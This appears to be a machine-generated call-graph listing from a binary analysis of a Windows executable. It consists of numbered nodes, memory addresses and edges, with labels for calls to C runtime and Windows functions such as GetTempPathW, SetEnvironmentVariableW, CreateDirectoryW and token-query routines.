15775->15776 15778 7ff7a67325bf MessageBoxW 15776->15778 15779 7ff7a673ad80 _wfindfirst32i64 8 API calls 15777->15779 15778->15777 15780 7ff7a6732609 15779->15780 15780->15043 15782 7ff7a674a798 _get_daylight 11 API calls 15781->15782 15783 7ff7a674447b 15782->15783 15784 7ff7a673254b 15783->15784 15785 7ff7a674dd40 _get_daylight 11 API calls 15783->15785 15788 7ff7a67444bb 15783->15788 15784->15770 15786 7ff7a67444b0 15785->15786 15787 7ff7a6749e18 __free_lconv_mon 11 API calls 15786->15787 15787->15788 15788->15784 15793 7ff7a674e418 15788->15793 15791 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15792 7ff7a6744500 15791->15792 15796 7ff7a674e435 15793->15796 15794 7ff7a674e43a 15795 7ff7a6744444 _get_daylight 11 API calls 15794->15795 15799 7ff7a67444e1 15794->15799 15801 7ff7a674e444 15795->15801 15796->15794 15798 7ff7a674e484 15796->15798 15796->15799 15797 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15797->15799 15798->15799 15800 7ff7a6744444 _get_daylight 11 API calls 15798->15800 15799->15784 15799->15791 15800->15801 15801->15797 15803 7ff7a6737bd2 WideCharToMultiByte 15802->15803 15804 7ff7a6737b64 WideCharToMultiByte 15802->15804 15805 7ff7a6737bff 15803->15805 15806 7ff7a6733c05 15803->15806 15807 7ff7a6737b8e 15804->15807 15808 7ff7a6737ba5 15804->15808 15809 7ff7a6732620 57 API calls 15805->15809 15806->15052 15806->15054 15810 7ff7a6732620 57 API calls 15807->15810 15808->15803 15811 7ff7a6737bbb 15808->15811 15809->15806 15810->15806 15812 7ff7a6732620 57 API calls 15811->15812 15812->15806 15814 7ff7a6736a0e 15813->15814 15815 7ff7a6749123 15813->15815 15814->15073 15815->15814 15816 7ff7a67491ac __std_exception_copy 37 API calls 15815->15816 15817 7ff7a6749150 15816->15817 15817->15814 15818 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15817->15818 15819 7ff7a6749180 15818->15819 15821 7ff7a67317e4 15820->15821 15822 7ff7a67317d4 15820->15822 15824 7ff7a6737200 83 API calls 15821->15824 15853 7ff7a6731842 15821->15853 15823 7ff7a6733cb0 116 
API calls 15822->15823 15823->15821 15825 7ff7a6731815 15824->15825 15825->15853 15854 7ff7a673f934 15825->15854 15827 7ff7a673182b 15829 7ff7a673184c 15827->15829 15830 7ff7a673182f 15827->15830 15828 7ff7a673ad80 _wfindfirst32i64 8 API calls 15831 7ff7a67319c0 15828->15831 15858 7ff7a673f5fc 15829->15858 15832 7ff7a67324d0 59 API calls 15830->15832 15831->15088 15831->15089 15832->15853 15835 7ff7a673f934 73 API calls 15837 7ff7a67318d1 15835->15837 15836 7ff7a67324d0 59 API calls 15836->15853 15838 7ff7a67318fe 15837->15838 15839 7ff7a67318e3 15837->15839 15841 7ff7a673f5fc _fread_nolock 53 API calls 15838->15841 15840 7ff7a67324d0 59 API calls 15839->15840 15840->15853 15842 7ff7a6731913 15841->15842 15843 7ff7a6731867 15842->15843 15844 7ff7a6731925 15842->15844 15843->15836 15861 7ff7a673f370 15844->15861 15847 7ff7a673193d 15848 7ff7a6732770 59 API calls 15847->15848 15848->15853 15849 7ff7a6731993 15851 7ff7a673f2ac 74 API calls 15849->15851 15849->15853 15850 7ff7a6731950 15850->15849 15852 7ff7a6732770 59 API calls 15850->15852 15851->15853 15852->15849 15853->15828 15855 7ff7a673f964 15854->15855 15867 7ff7a673f6c4 15855->15867 15857 7ff7a673f97d 15857->15827 15879 7ff7a673f61c 15858->15879 15862 7ff7a673f379 15861->15862 15863 7ff7a6731939 15861->15863 15864 7ff7a6744444 _get_daylight 11 API calls 15862->15864 15863->15847 15863->15850 15865 7ff7a673f37e 15864->15865 15866 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15865->15866 15866->15863 15868 7ff7a673f72e 15867->15868 15869 7ff7a673f6ee 15867->15869 15868->15869 15871 7ff7a673f73a 15868->15871 15870 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15869->15870 15872 7ff7a673f715 15870->15872 15878 7ff7a67442ec EnterCriticalSection 15871->15878 15872->15857 15880 7ff7a673f646 15879->15880 15891 7ff7a6731861 15879->15891 15881 7ff7a673f692 15880->15881 15883 7ff7a673f655 __scrt_get_show_window_mode 15880->15883 15880->15891 15892 7ff7a67442ec EnterCriticalSection 15881->15892 15885 
7ff7a6744444 _get_daylight 11 API calls 15883->15885 15887 7ff7a673f66a 15885->15887 15889 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15887->15889 15889->15891 15891->15835 15891->15843 15986 7ff7a6736720 15893->15986 15895 7ff7a6731459 15895->15114 15896 7ff7a6731454 15896->15895 15995 7ff7a6736a40 15896->15995 15899 7ff7a67314a7 15902 7ff7a67314e0 15899->15902 15905 7ff7a6733cb0 116 API calls 15899->15905 15900 7ff7a6731487 15901 7ff7a67324d0 59 API calls 15900->15901 15904 7ff7a673149d 15901->15904 15903 7ff7a673f934 73 API calls 15902->15903 15906 7ff7a67314f2 15903->15906 15904->15114 15907 7ff7a67314bf 15905->15907 15908 7ff7a6731516 15906->15908 15909 7ff7a67314f6 15906->15909 15907->15902 15910 7ff7a67314c7 15907->15910 15912 7ff7a673151c 15908->15912 15913 7ff7a6731534 15908->15913 15911 7ff7a67324d0 59 API calls 15909->15911 15914 7ff7a6732770 59 API calls 15910->15914 15921 7ff7a67314d6 __vcrt_freefls 15911->15921 16020 7ff7a6731050 15912->16020 15917 7ff7a6731556 15913->15917 15925 7ff7a6731575 15913->15925 15914->15921 15916 7ff7a6731624 15919 7ff7a673f2ac 74 API calls 15916->15919 15920 7ff7a67324d0 59 API calls 15917->15920 15918 7ff7a673f2ac 74 API calls 15918->15916 15919->15904 15920->15921 15921->15916 15921->15918 15922 7ff7a673f5fc _fread_nolock 53 API calls 15922->15925 15923 7ff7a67315d5 15926 7ff7a67324d0 59 API calls 15923->15926 15925->15921 15925->15922 15925->15923 16038 7ff7a673fd3c 15925->16038 15926->15921 15928 7ff7a67329a6 15927->15928 15929 7ff7a6731b30 49 API calls 15928->15929 15931 7ff7a67329db 15929->15931 15930 7ff7a6732de1 15931->15930 15932 7ff7a6733b20 49 API calls 15931->15932 15933 7ff7a6732a4f 15932->15933 16617 7ff7a6732e00 15933->16617 15936 7ff7a6732aca 15938 7ff7a6732e00 75 API calls 15936->15938 15937 7ff7a6732a91 15939 7ff7a6736720 98 API calls 15937->15939 15940 7ff7a6732b1c 15938->15940 15941 7ff7a6732a99 15939->15941 15942 7ff7a6732b20 15940->15942 15943 7ff7a6732b86 15940->15943 15944 7ff7a6732aba 
15941->15944 16625 7ff7a6736600 15941->16625 15946 7ff7a6736720 98 API calls 15942->15946 15945 7ff7a6732e00 75 API calls 15943->15945 15947 7ff7a6732770 59 API calls 15944->15947 15951 7ff7a6732ac3 15944->15951 15949 7ff7a6732bb2 15945->15949 15950 7ff7a6732b28 15946->15950 15947->15951 15952 7ff7a6732e00 75 API calls 15949->15952 15962 7ff7a6732c12 15949->15962 15950->15944 15953 7ff7a6736600 138 API calls 15950->15953 15955 7ff7a673ad80 _wfindfirst32i64 8 API calls 15951->15955 15956 7ff7a6732be2 15952->15956 15957 7ff7a6732b45 15953->15957 15954 7ff7a6736720 98 API calls 15958 7ff7a6732c22 15954->15958 15959 7ff7a6732b7b 15955->15959 15960 7ff7a6732e00 75 API calls 15956->15960 15956->15962 15957->15944 15963 7ff7a6732dc6 15957->15963 15958->15930 15961 7ff7a6731af0 59 API calls 15958->15961 15975 7ff7a6732d3f 15958->15975 15959->15114 15960->15962 15964 7ff7a6732c7f 15961->15964 15962->15930 15962->15954 15965 7ff7a6732770 59 API calls 15963->15965 15964->15930 15967 7ff7a6731b30 49 API calls 15964->15967 15966 7ff7a6732d3a 15965->15966 15968 7ff7a6731ab0 74 API calls 15966->15968 15969 7ff7a6732ca7 15967->15969 15968->15930 15969->15963 15971 7ff7a6731b30 49 API calls 15969->15971 15970 7ff7a6732dab 15970->15963 15973 7ff7a6731440 161 API calls 15970->15973 15972 7ff7a6732cd4 15971->15972 15972->15963 15973->15970 15975->15970 15977 7ff7a6731780 59 API calls 15975->15977 15977->15975 15983 7ff7a67317a1 15982->15983 15984 7ff7a6731795 15982->15984 15983->15114 15985 7ff7a6732770 59 API calls 15984->15985 15985->15983 15987 7ff7a6736768 15986->15987 15988 7ff7a6736732 15986->15988 15987->15896 16042 7ff7a67316d0 15988->16042 15993 7ff7a6732770 59 API calls 15994 7ff7a673675d 15993->15994 15994->15896 15996 7ff7a6736a50 15995->15996 15997 7ff7a6731b30 49 API calls 15996->15997 15998 7ff7a6736a81 15997->15998 15999 7ff7a6731b30 49 API calls 15998->15999 16010 7ff7a6736c4b 15998->16010 16002 7ff7a6736aa8 15999->16002 16000 7ff7a673ad80 _wfindfirst32i64 8 API calls 
16001 7ff7a673147f 16000->16001 16001->15899 16001->15900 16002->16010 16567 7ff7a67450e8 16002->16567 16004 7ff7a6736bb9 16005 7ff7a6737a30 57 API calls 16004->16005 16007 7ff7a6736bd1 16005->16007 16006 7ff7a6736c7a 16008 7ff7a6733cb0 116 API calls 16006->16008 16007->16006 16009 7ff7a6736990 61 API calls 16007->16009 16014 7ff7a6736c02 __vcrt_freefls 16007->16014 16008->16010 16009->16014 16010->16000 16011 7ff7a6736c6e 16013 7ff7a6732880 59 API calls 16011->16013 16012 7ff7a6736c3f 16576 7ff7a6732880 16012->16576 16013->16006 16014->16011 16014->16012 16016 7ff7a6736add 16016->16004 16016->16010 16017 7ff7a67450e8 49 API calls 16016->16017 16018 7ff7a6737a30 57 API calls 16016->16018 16019 7ff7a67378a0 58 API calls 16016->16019 16017->16016 16018->16016 16019->16016 16021 7ff7a67310a6 16020->16021 16022 7ff7a67310ad 16021->16022 16023 7ff7a67310d3 16021->16023 16024 7ff7a6732770 59 API calls 16022->16024 16026 7ff7a6731109 16023->16026 16027 7ff7a67310ed 16023->16027 16025 7ff7a67310c0 16024->16025 16025->15921 16029 7ff7a673111b 16026->16029 16034 7ff7a6731137 memcpy_s 16026->16034 16028 7ff7a67324d0 59 API calls 16027->16028 16032 7ff7a6731104 __vcrt_freefls 16028->16032 16030 7ff7a67324d0 59 API calls 16029->16030 16030->16032 16031 7ff7a673f5fc _fread_nolock 53 API calls 16031->16034 16032->15921 16033 7ff7a6732770 59 API calls 16033->16032 16034->16031 16034->16032 16035 7ff7a673fd3c 76 API calls 16034->16035 16036 7ff7a67311fe 16034->16036 16037 7ff7a673f370 37 API calls 16034->16037 16035->16034 16036->16033 16037->16034 16039 7ff7a673fd6c 16038->16039 16602 7ff7a673fa8c 16039->16602 16041 7ff7a673fd8a 16041->15925 16043 7ff7a67316f5 16042->16043 16044 7ff7a6732770 59 API calls 16043->16044 16045 7ff7a6731738 16043->16045 16044->16045 16046 7ff7a6736780 16045->16046 16047 7ff7a6736798 16046->16047 16048 7ff7a67367b8 16047->16048 16049 7ff7a673680b 16047->16049 16051 7ff7a6736990 61 API calls 16048->16051 16050 7ff7a6736810 GetTempPathW 16049->16050 16052 
7ff7a6736825 16050->16052 16053 7ff7a67367c4 16051->16053 16086 7ff7a6732470 16052->16086 16110 7ff7a6736480 16053->16110 16058 7ff7a673ad80 _wfindfirst32i64 8 API calls 16061 7ff7a673674d 16058->16061 16060 7ff7a67367ea __vcrt_freefls 16060->16050 16063 7ff7a67367f8 16060->16063 16061->15987 16061->15993 16064 7ff7a673683e __vcrt_freefls 16065 7ff7a67368e6 16064->16065 16070 7ff7a6736871 16064->16070 16090 7ff7a674736c 16064->16090 16093 7ff7a67378a0 16064->16093 16067 7ff7a6737b40 59 API calls 16065->16067 16069 7ff7a67368f7 __vcrt_freefls 16067->16069 16073 7ff7a6737a30 57 API calls 16069->16073 16085 7ff7a67368aa __vcrt_freefls 16069->16085 16071 7ff7a6737a30 57 API calls 16070->16071 16070->16085 16072 7ff7a6736887 16071->16072 16074 7ff7a67368c9 SetEnvironmentVariableW 16072->16074 16075 7ff7a673688c 16072->16075 16076 7ff7a6736915 16073->16076 16074->16085 16077 7ff7a6737a30 57 API calls 16075->16077 16078 7ff7a673691a 16076->16078 16079 7ff7a673694d SetEnvironmentVariableW 16076->16079 16080 7ff7a673689c 16077->16080 16081 7ff7a6737a30 57 API calls 16078->16081 16079->16085 16082 7ff7a67466b4 38 API calls 16080->16082 16082->16085 16085->16058 16087 7ff7a6732495 16086->16087 16144 7ff7a6743e38 16087->16144 16316 7ff7a6746f98 16090->16316 16094 7ff7a673adb0 16093->16094 16095 7ff7a67378b0 GetCurrentProcess OpenProcessToken 16094->16095 16096 7ff7a67378fb GetTokenInformation 16095->16096 16099 7ff7a6737971 __vcrt_freefls 16095->16099 16097 7ff7a6737928 16096->16097 16098 7ff7a673791d GetLastError 16096->16098 16097->16099 16102 7ff7a673793e GetTokenInformation 16097->16102 16098->16097 16098->16099 16100 7ff7a673798a 16099->16100 16101 7ff7a6737984 CloseHandle 16099->16101 16447 7ff7a67375a0 16100->16447 16101->16100 16102->16099 16104 7ff7a6737964 ConvertSidToStringSidW 16102->16104 16104->16099 16111 7ff7a673648c 16110->16111 16112 7ff7a6737a30 57 API calls 16111->16112 16113 7ff7a67364ae 16112->16113 16114 7ff7a67364c9 ExpandEnvironmentStringsW 
16113->16114 16115 7ff7a67364b6 16113->16115 16116 7ff7a67364ef __vcrt_freefls 16114->16116 16117 7ff7a6732770 59 API calls 16115->16117 16118 7ff7a6736506 16116->16118 16119 7ff7a67364f3 16116->16119 16123 7ff7a67364c2 16117->16123 16124 7ff7a6736520 16118->16124 16125 7ff7a6736514 16118->16125 16121 7ff7a6732770 59 API calls 16119->16121 16120 7ff7a673ad80 _wfindfirst32i64 8 API calls 16122 7ff7a67365e8 16120->16122 16121->16123 16122->16085 16134 7ff7a67466b4 16122->16134 16123->16120 16458 7ff7a6745348 16124->16458 16451 7ff7a6745f44 16125->16451 16128 7ff7a673651e 16129 7ff7a673653a 16128->16129 16132 7ff7a673654d __scrt_get_show_window_mode 16128->16132 16130 7ff7a6732770 59 API calls 16129->16130 16130->16123 16131 7ff7a67365c2 CreateDirectoryW 16131->16123 16132->16131 16133 7ff7a673659c CreateDirectoryW 16132->16133 16133->16132 16135 7ff7a67466c1 16134->16135 16136 7ff7a67466d4 16134->16136 16137 7ff7a6744444 _get_daylight 11 API calls 16135->16137 16559 7ff7a6746338 16136->16559 16139 7ff7a67466c6 16137->16139 16141 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16139->16141 16142 7ff7a67466d2 16141->16142 16142->16060 16147 7ff7a6743e92 16144->16147 16145 7ff7a6743eb7 16146 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16145->16146 16150 7ff7a6743ee1 16146->16150 16147->16145 16148 7ff7a6743ef3 16147->16148 16162 7ff7a67421f0 16148->16162 16151 7ff7a673ad80 _wfindfirst32i64 8 API calls 16150->16151 16154 7ff7a67324b4 16151->16154 16152 7ff7a6749e18 __free_lconv_mon 11 API calls 16152->16150 16153 7ff7a6743fa0 16159 7ff7a6743fd4 16153->16159 16161 7ff7a6743fa9 16153->16161 16154->16064 16156 7ff7a6743ffa 16157 7ff7a6744004 16156->16157 16156->16159 16160 7ff7a6749e18 __free_lconv_mon 11 API calls 16157->16160 16158 7ff7a6749e18 __free_lconv_mon 11 API calls 16158->16150 16159->16152 16160->16150 16161->16158 16163 7ff7a674222e 16162->16163 16164 7ff7a674221e 16162->16164 16165 7ff7a6742237 16163->16165 16166 7ff7a6742265 16163->16166 16167 
7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16164->16167 16168 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16165->16168 16166->16164 16169 7ff7a674225d 16166->16169 16173 7ff7a6742c04 16166->16173 16206 7ff7a6742650 16166->16206 16243 7ff7a6741de0 16166->16243 16167->16169 16168->16169 16169->16153 16169->16156 16169->16159 16169->16161 16174 7ff7a6742cb7 16173->16174 16175 7ff7a6742c46 16173->16175 16178 7ff7a6742cbc 16174->16178 16179 7ff7a6742d10 16174->16179 16176 7ff7a6742c4c 16175->16176 16177 7ff7a6742ce1 16175->16177 16180 7ff7a6742c51 16176->16180 16181 7ff7a6742c80 16176->16181 16262 7ff7a6740fb4 16177->16262 16182 7ff7a6742cbe 16178->16182 16183 7ff7a6742cf1 16178->16183 16185 7ff7a6742d27 16179->16185 16187 7ff7a6742d1a 16179->16187 16191 7ff7a6742d1f 16179->16191 16180->16185 16188 7ff7a6742c57 16180->16188 16181->16188 16181->16191 16186 7ff7a6742c60 16182->16186 16195 7ff7a6742ccd 16182->16195 16269 7ff7a6740ba4 16183->16269 16276 7ff7a674390c 16185->16276 16204 7ff7a6742d50 16186->16204 16246 7ff7a67433b8 16186->16246 16187->16177 16187->16191 16188->16186 16194 7ff7a6742c92 16188->16194 16202 7ff7a6742c7b 16188->16202 16191->16204 16280 7ff7a67413c4 16191->16280 16194->16204 16256 7ff7a67436f4 16194->16256 16195->16177 16197 7ff7a6742cd2 16195->16197 16200 7ff7a67437b8 37 API calls 16197->16200 16197->16204 16198 7ff7a673ad80 _wfindfirst32i64 8 API calls 16199 7ff7a674304a 16198->16199 16199->16166 16200->16202 16201 7ff7a6743a20 45 API calls 16205 7ff7a6742f3c 16201->16205 16202->16201 16202->16204 16202->16205 16204->16198 16205->16204 16287 7ff7a674dbb0 16205->16287 16207 7ff7a674265e 16206->16207 16208 7ff7a6742674 16206->16208 16209 7ff7a6742cb7 16207->16209 16210 7ff7a6742c46 16207->16210 16211 7ff7a67426b4 16207->16211 16208->16211 16212 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16208->16212 16215 7ff7a6742cbc 16209->16215 16216 7ff7a6742d10 16209->16216 16213 7ff7a6742c4c 16210->16213 16214 7ff7a6742ce1 
16210->16214 16211->16166 16212->16211 16217 7ff7a6742c51 16213->16217 16218 7ff7a6742c80 16213->16218 16221 7ff7a6740fb4 38 API calls 16214->16221 16219 7ff7a6742cbe 16215->16219 16220 7ff7a6742cf1 16215->16220 16222 7ff7a6742d27 16216->16222 16224 7ff7a6742d1a 16216->16224 16228 7ff7a6742d1f 16216->16228 16217->16222 16225 7ff7a6742c57 16217->16225 16218->16225 16218->16228 16223 7ff7a6742c60 16219->16223 16232 7ff7a6742ccd 16219->16232 16226 7ff7a6740ba4 38 API calls 16220->16226 16239 7ff7a6742c7b 16221->16239 16229 7ff7a674390c 45 API calls 16222->16229 16227 7ff7a67433b8 47 API calls 16223->16227 16242 7ff7a6742d50 16223->16242 16224->16214 16224->16228 16225->16223 16230 7ff7a6742c92 16225->16230 16225->16239 16226->16239 16227->16239 16231 7ff7a67413c4 38 API calls 16228->16231 16228->16242 16229->16239 16233 7ff7a67436f4 46 API calls 16230->16233 16230->16242 16231->16239 16232->16214 16234 7ff7a6742cd2 16232->16234 16233->16239 16237 7ff7a67437b8 37 API calls 16234->16237 16234->16242 16235 7ff7a673ad80 _wfindfirst32i64 8 API calls 16236 7ff7a674304a 16235->16236 16236->16166 16237->16239 16238 7ff7a6743a20 45 API calls 16241 7ff7a6742f3c 16238->16241 16239->16238 16239->16241 16239->16242 16240 7ff7a674dbb0 46 API calls 16240->16241 16241->16240 16241->16242 16242->16235 16299 7ff7a6740228 16243->16299 16247 7ff7a67433de 16246->16247 16248 7ff7a673fde0 12 API calls 16247->16248 16249 7ff7a674342e 16248->16249 16257 7ff7a6743729 16256->16257 16258 7ff7a674376e 16257->16258 16259 7ff7a6743747 16257->16259 16260 7ff7a6743a20 45 API calls 16257->16260 16258->16202 16261 7ff7a674dbb0 46 API calls 16259->16261 16260->16259 16261->16258 16263 7ff7a6740fe7 16262->16263 16264 7ff7a6741016 16263->16264 16266 7ff7a67410d3 16263->16266 16265 7ff7a673fe88 12 API calls 16264->16265 16268 7ff7a6741053 16264->16268 16265->16268 16267 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16266->16267 16267->16268 16268->16202 16270 7ff7a6740bd7 16269->16270 16271 
7ff7a6740c06 16270->16271 16273 7ff7a6740cc3 16270->16273 16272 7ff7a673fe88 12 API calls 16271->16272 16275 7ff7a6740c43 16271->16275 16272->16275 16274 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16273->16274 16274->16275 16275->16202 16277 7ff7a674394f 16276->16277 16278 7ff7a67439a8 45 API calls 16277->16278 16279 7ff7a6743953 __crtLCMapStringW 16277->16279 16278->16279 16279->16202 16281 7ff7a67413f7 16280->16281 16282 7ff7a6741426 16281->16282 16284 7ff7a67414e3 16281->16284 16283 7ff7a673fe88 12 API calls 16282->16283 16286 7ff7a6741463 16282->16286 16283->16286 16285 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16284->16285 16285->16286 16286->16202 16288 7ff7a674dbe1 16287->16288 16296 7ff7a674dbef 16287->16296 16288->16296 16296->16205 16300 7ff7a674025d 16299->16300 16301 7ff7a674026f 16299->16301 16302 7ff7a6744444 _get_daylight 11 API calls 16300->16302 16304 7ff7a674027d 16301->16304 16308 7ff7a67402b9 16301->16308 16303 7ff7a6740262 16302->16303 16305 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16303->16305 16306 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16304->16306 16313 7ff7a674026d 16305->16313 16306->16313 16307 7ff7a6740635 16309 7ff7a6744444 _get_daylight 11 API calls 16307->16309 16307->16313 16308->16307 16310 7ff7a6744444 _get_daylight 11 API calls 16308->16310 16311 7ff7a67408c9 16309->16311 16312 7ff7a674062a 16310->16312 16314 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16311->16314 16315 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16312->16315 16313->16166 16314->16313 16315->16307 16357 7ff7a6750698 16316->16357 16416 7ff7a6750410 16357->16416 16437 7ff7a674f788 EnterCriticalSection 16416->16437 16448 7ff7a67375c5 16447->16448 16449 7ff7a6743e38 48 API calls 16448->16449 16452 7ff7a6745f95 16451->16452 16453 7ff7a6745f62 16451->16453 16452->16128 16453->16452 16470 7ff7a674f924 16453->16470 16456 7ff7a6749dd0 _wfindfirst32i64 17 API calls 16457 7ff7a6745fc5 16456->16457 16459 
7ff7a67453d2 16458->16459 16460 7ff7a6745364 16458->16460 16504 7ff7a674f090 16459->16504 16460->16459 16462 7ff7a6745369 16460->16462 16463 7ff7a674539e 16462->16463 16464 7ff7a6745381 16462->16464 16487 7ff7a674518c GetFullPathNameW 16463->16487 16479 7ff7a6745118 GetFullPathNameW 16464->16479 16469 7ff7a6745396 __vcrt_freefls 16469->16128 16471 7ff7a674f93b 16470->16471 16472 7ff7a674f931 16470->16472 16473 7ff7a6744444 _get_daylight 11 API calls 16471->16473 16472->16471 16477 7ff7a674f957 16472->16477 16474 7ff7a674f943 16473->16474 16476 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16474->16476 16475 7ff7a6745f91 16475->16452 16475->16456 16476->16475 16477->16475 16478 7ff7a6744444 _get_daylight 11 API calls 16477->16478 16478->16474 16480 7ff7a674513e GetLastError 16479->16480 16481 7ff7a6745154 16479->16481 16482 7ff7a67443b8 _fread_nolock 11 API calls 16480->16482 16483 7ff7a6745150 16481->16483 16485 7ff7a6744444 _get_daylight 11 API calls 16481->16485 16484 7ff7a674514b 16482->16484 16483->16469 16486 7ff7a6744444 _get_daylight 11 API calls 16484->16486 16485->16483 16486->16483 16488 7ff7a67451bf GetLastError 16487->16488 16492 7ff7a67451d5 __vcrt_freefls 16487->16492 16489 7ff7a67443b8 _fread_nolock 11 API calls 16488->16489 16490 7ff7a67451cc 16489->16490 16493 7ff7a6744444 _get_daylight 11 API calls 16490->16493 16491 7ff7a67451d1 16495 7ff7a6745264 16491->16495 16492->16491 16494 7ff7a674522f GetFullPathNameW 16492->16494 16493->16491 16494->16488 16494->16491 16499 7ff7a67452d8 memcpy_s 16495->16499 16500 7ff7a674528d __scrt_get_show_window_mode 16495->16500 16499->16469 16500->16499 16507 7ff7a674eea0 16504->16507 16508 7ff7a674eecb 16507->16508 16509 7ff7a674eee2 16507->16509 16512 7ff7a6744444 _get_daylight 11 API calls 16508->16512 16510 7ff7a674ef07 16509->16510 16511 7ff7a674eee6 16509->16511 16545 7ff7a674e508 16510->16545 16533 7ff7a674f00c 16511->16533 16515 7ff7a674eed0 16512->16515 16519 7ff7a6749db0 _invalid_parameter_noinfo 37 
API calls 16515->16519 16532 7ff7a674eedb __vcrt_freefls 16519->16532 16534 7ff7a674f056 16533->16534 16535 7ff7a674f026 16533->16535 16536 7ff7a674f041 16534->16536 16537 7ff7a674f061 GetDriveTypeW 16534->16537 16538 7ff7a6744424 _fread_nolock 11 API calls 16535->16538 16537->16536 16546 7ff7a673c210 __scrt_get_show_window_mode 16545->16546 16547 7ff7a674e53e GetCurrentDirectoryW 16546->16547 16566 7ff7a674f788 EnterCriticalSection 16559->16566 16568 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16567->16568 16570 7ff7a67450fd 16568->16570 16569 7ff7a674ee97 16589 7ff7a673af14 16569->16589 16570->16569 16573 7ff7a674edb6 16570->16573 16574 7ff7a673ad80 _wfindfirst32i64 8 API calls 16573->16574 16575 7ff7a674ee8f 16574->16575 16575->16016 16577 7ff7a67328a0 16576->16577 16578 7ff7a6743be4 49 API calls 16577->16578 16579 7ff7a67328ed __scrt_get_show_window_mode 16578->16579 16580 7ff7a6737a30 57 API calls 16579->16580 16581 7ff7a673291a 16580->16581 16582 7ff7a6732959 MessageBoxA 16581->16582 16583 7ff7a673291f 16581->16583 16592 7ff7a673af28 IsProcessorFeaturePresent 16589->16592 16593 7ff7a673af3f 16592->16593 16598 7ff7a673afc4 RtlCaptureContext RtlLookupFunctionEntry 16593->16598 16599 7ff7a673af53 16598->16599 16600 7ff7a673aff4 RtlVirtualUnwind 16598->16600 16601 7ff7a673ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16599->16601 16600->16599 16603 7ff7a673faac 16602->16603 16608 7ff7a673fad9 16602->16608 16604 7ff7a673fae1 16603->16604 16605 7ff7a673fab6 16603->16605 16603->16608 16609 7ff7a673f9cc 16604->16609 16606 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 16605->16606 16606->16608 16608->16041 16616 7ff7a67442ec EnterCriticalSection 16609->16616 16618 7ff7a6732e34 16617->16618 16619 7ff7a6743be4 49 API calls 16618->16619 16620 7ff7a6732e5a 16619->16620 16621 7ff7a6732e6b 16620->16621 16649 7ff7a6744e08 16620->16649 16623 7ff7a673ad80 _wfindfirst32i64 8 API calls 16621->16623 16624 
7ff7a6732a8d 16623->16624 16624->15936 16624->15937 16626 7ff7a673660e 16625->16626 16627 7ff7a6733cb0 116 API calls 16626->16627 16628 7ff7a6736635 16627->16628 16629 7ff7a6736a40 136 API calls 16628->16629 16630 7ff7a6736643 16629->16630 16631 7ff7a67366f3 16630->16631 16633 7ff7a673665d 16630->16633 16632 7ff7a67366ef 16631->16632 16635 7ff7a673f2ac 74 API calls 16631->16635 16636 7ff7a673ad80 _wfindfirst32i64 8 API calls 16632->16636 16833 7ff7a673f344 16633->16833 16635->16632 16638 7ff7a6736715 16636->16638 16637 7ff7a67366d0 16639 7ff7a673f2ac 74 API calls 16637->16639 16638->15944 16640 7ff7a673f5fc _fread_nolock 53 API calls 16647 7ff7a6736662 16640->16647 16643 7ff7a673f370 37 API calls 16643->16647 16644 7ff7a673fd3c 76 API calls 16644->16647 16645 7ff7a6736699 16839 7ff7a6747388 16645->16839 16646 7ff7a673f344 37 API calls 16646->16647 16647->16637 16647->16640 16647->16643 16647->16644 16647->16645 16647->16646 16650 7ff7a6744e31 16649->16650 16651 7ff7a6744e25 16649->16651 16691 7ff7a6744a1c 16650->16691 16666 7ff7a6744680 16651->16666 16654 7ff7a6744e2a 16654->16621 16657 7ff7a6744e69 16702 7ff7a6744504 16657->16702 16660 7ff7a6744ed9 16662 7ff7a6744680 69 API calls 16660->16662 16661 7ff7a6744ec5 16661->16654 16664 7ff7a6749e18 __free_lconv_mon 11 API calls 16661->16664 16663 7ff7a6744ee5 16662->16663 16663->16654 16665 7ff7a6749e18 __free_lconv_mon 11 API calls 16663->16665 16664->16654 16665->16654 16667 7ff7a674469a 16666->16667 16668 7ff7a67446b7 16666->16668 16669 7ff7a6744424 _fread_nolock 11 API calls 16667->16669 16668->16667 16670 7ff7a67446ca CreateFileW 16668->16670 16671 7ff7a674469f 16669->16671 16672 7ff7a67446fe 16670->16672 16673 7ff7a6744734 16670->16673 16675 7ff7a6744444 _get_daylight 11 API calls 16671->16675 16724 7ff7a67447d4 GetFileType 16672->16724 16750 7ff7a6744cf8 16673->16750 16678 7ff7a67446a7 16675->16678 16682 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 16678->16682 16680 7ff7a6744768 16771 7ff7a6744ab8 
